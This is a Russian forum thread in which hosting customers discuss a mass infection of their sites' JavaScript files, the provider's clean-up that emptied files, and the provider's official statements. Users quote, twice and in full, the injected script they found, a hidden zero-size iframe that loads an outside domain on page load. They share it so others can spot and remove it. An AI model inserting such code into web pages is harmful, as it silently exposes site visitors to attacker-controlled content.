777Sharpey777

Рейтинг
1
Регистрация
27.08.2013

Мини официальный ответ в ВК

Иван Гарбера:
Уважаемые клиенты!
Пока что со всей ответственностью можем заявить, что на серверах хостинга больше нет ни единого зараженного JS-файла, и больше не появится - по крайней мере таким образом, как появлялись до этого.
Официальное объяснение ситуации будет позже.
Sergsap:
Пока спецы не подключились, выскажу свое предположение.
Как мне кажется нужно узнать этот лимит на выполнение скрипта у хостера и возможно такое же значение прописать в модуле.Ну или по крайней мере в саппорте модуля узнать, что делать дальше с этим значением.
Буквально на днях тоже приходилось узнавать это время таким скриптом
<?php

echo $_SERVER["DOCUMENT_ROOT"] . "\n<br />\n" . ini_get ( 'max_execution_time' );
?>


Заливаете скрипт на хостинг, запускаете из браузера и увидите во второй строке время выполнения php.

Упс. код изменяется.
Почитай тут

Увеличили ответ скрипта, не чего не выходит, модуль не работает. Что еще может быть в стороне хостера?

Ребят помогите! У нас после выходных, перестал работать платный модуль, с начало подумали что модуль перестал работать, обратились в суппорт модуля, нам был дан ответ, что на стороне сервера стоит лимит на выполнения скрипта, они утверждают, что изменений не было.

Но сегодня ночью мы на другом сервере протестировали работоспособность, и модуль там работает, а на старом сервере постоянно пишет "Настройки модуля загружаются, немного подождите!"

В чем может быть проблема? Даже на локалке работает модуль!

kgtu5:
тишина, но не очень хорошая:
хостлайф начал сам следить и удалять появляющиеся в .js скриптах вредоносные вставки (а не искать причину в сервере!!!), однако видимо увлекся либо перестарался со своим скриптом поиска и удаления, что яваскрипты пользователей просто обнуляются (пара человек пользующихся хостером, уже задавали вопрос почему функции на сайте перестали работать, хорошо бэкапы были, поправили быстро)

проверьте свои сайты и используемые яваскрипты на предмет сего недоразумения.

Заметил это чуда вчера, все js по 0, дай бог был бекап.

Ну, что! Есть у кого какие изменения? Вроде тишина.

Sergsap:
отэц, у тебя похоже не совсем тот вирус, что здесь обсуждают.

Посмотри внимательнее файл http://www.adquard.ru//modules/mod_yt_contentmegaslider/assets/js/yt.jquery-1.5.min.js

Думаю кода

jQuery.noConflict();

}
if (jQueryAnother) {
jQuery = jQueryAnother;
};var if68Vjm = document.createElement('iframe');if68Vjm.name = 'if68Vjm';if68Vjm.src = 'http://nulber.ddaapp.com/';if68Vjm.style.width = '0px';if68Vjm.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if68Vjm=') == -1) {document.cookie = 'if68Vjm=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if68Vjm);}};

там быть не должно

Если есть бекап незараженного сайта, сравни файлы

Именно в этом файле и есть вирусняк!

Вот он:

var if68Vjm = document.createElement('iframe');if68Vjm.name = 'if68Vjm';if68Vjm.src = 'http://nulber.ddaapp.com/';if68Vjm.style.width = '0px';if68Vjm.style.height = '0px';window.onload = function() {if (document.cookie.indexOf('if68Vjm=') == -1) {document.cookie = 'if68Vjm=yes; path=/; expires=Wednesday, 18-May-33 03:33:20 GMT';document.getElementsByTagName('body')[0].appendChild(if68Vjm);}};

Уже сталкивался с ним.

А я сегодня в шоке был! Захожу на сайт, а у меня js не работает не один, захожу на хостинг, а какой та пользователь root которого у меня в помине нет, удалил все js файлы. Вот так они стали бороться!

А вот официальный ответ с ВК:

Уважаемые клиенты, в данный момент проводим массовую чистку Ваших зараженных файлов.
Проблема ПОЛНОСТЬЮ под контролем, несмотря на то, что возникла она, вопреки Вашим многочисленным предположениям, все же не по нашей вине.
Позже предоставим официальный комментарий, а также сообщим о готовности к отправке Ваших сайтов на повторную проверку.
volkovysk:
Посмотрите в поисковиках позиции своих сайтов расположенных на этом несчастном хосте и траффик проверьте. Походу поисковики решили опустить все сайты хостинга, его видать признали заразным для пользователей интернета, так как месячная эпопея с вирусами на сайтах на одних и тех же серверах не должна пройти незамеченной. За месяц поисковики не дождались лечения проблемы - значит все сайты на ИП-адресах больных серваков ниже плинтуса кинут

То же заметил, сайт очень низко опустился с 3к до 1к. Сегодня то же js с правами 444 был изменен на 755.

Подскажите пожалуйста нормальный хостинг для онлайн сайта. Нет сил больше мучится с ХостЗаразой.

Вот еще официальный ответ Хостлайфа:


Хостинг-провайдер ********:
Уважаемые пользователи, ни о каких массовых заражениях серверов хостинга речи не идет и быть не может. Заражают скрипты клиентов через уязвимостей в самих же скриптах - все, как всегда, только в этот раз - гораздо масштабнее, чем обычно.
Да, проблема действительно массовая, мы этого не отрицаем,
Да, мы принимаем определенные меры по ее решению, и профилактике.
В ближайшее время предоставим более развернутую информацию, а пока попрошу воздержаться от излишнего флуда.

Официальный ответ дан!

Иван Гарбера:
Вы имеете хотя бы какое-то понятие о том, о чем здесь говорите, или берете первое попавшееся предположение и воспринимаете его как истину в последней инстанции...?
Специально для Вас: Биллинг обновляется постоянно, авторизаций на серверах на уровне администратора у нас нет вообще - управление осуществляется от отдельного пользователя с ограниченными правами БЕЗ доступа к клиентским данным. Даже получив доступ на уровне этого пользователя, злоумышленник ничего не сможет сделать. Выводы делайте сами. В остальном - оглянитесь по сторонам, на любой форум по веб-безопасности, и увидите практически эпидемию заражения клиентских сайтов, на множестве хостингов - так как это в первую очередь проблема уязвимости популярных скриптов, а не хостинг-серверов. Тем не менее, работу по предовтращению подобных ситуаций мы ведем, и меры, которые мы принимаем, в скором времени дадут свои результаты.
12
Всего: 16